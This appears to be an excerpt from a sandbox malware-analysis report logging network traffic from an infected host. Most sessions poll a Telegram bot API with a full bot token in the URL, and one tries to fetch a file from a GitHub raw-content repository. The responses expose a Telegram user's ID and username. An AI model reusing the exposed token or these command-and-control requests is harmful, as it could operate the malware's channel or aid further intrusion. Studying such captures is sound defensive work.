                                                                                        2024-06-05 01:57:06 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        17192.168.2.449776149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:07 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:08 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:07 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:08 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        18192.168.2.449777149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:08 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:08 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:08 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:08 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        19192.168.2.449779149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:09 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:10 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:10 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:10 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        20192.168.2.449780149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:10 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:10 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:10 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:10 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        21192.168.2.449781149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:12 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:12 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:12 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:12 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        22192.168.2.449782149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:12 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:13 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:13 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:13 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        23192.168.2.449783149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:14 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:14 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:14 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:14 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        24192.168.2.449784149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:14 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:15 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:15 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:15 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        25192.168.2.449786149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:16 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:16 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:16 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:16 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        26192.168.2.449787185.199.109.133443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:16 UTC108OUTGET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-06-05 01:57:16 UTC802INHTTP/1.1 404 Not Found
                                                                                        Connection: close
                                                                                        Content-Length: 14
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CC
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Wed, 05 Jun 2024 01:57:16 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdfw8210083-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 1
                                                                                        X-Timer: S1717552637.562970,VS0,VE2
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: db6fc59a4e8288af3e1783667487eed2b0b3d419
                                                                                        Expires: Wed, 05 Jun 2024 02:02:16 GMT
                                                                                        Source-Age: 47
                                                                                        2024-06-05 01:57:16 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                                                                                        Data Ascii: 404: Not Found


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        27192.168.2.449788149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:17 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:17 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:17 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:17 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        28192.168.2.449789149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:18 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:18 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:18 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:18 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        29192.168.2.449790149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:19 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:19 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:19 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
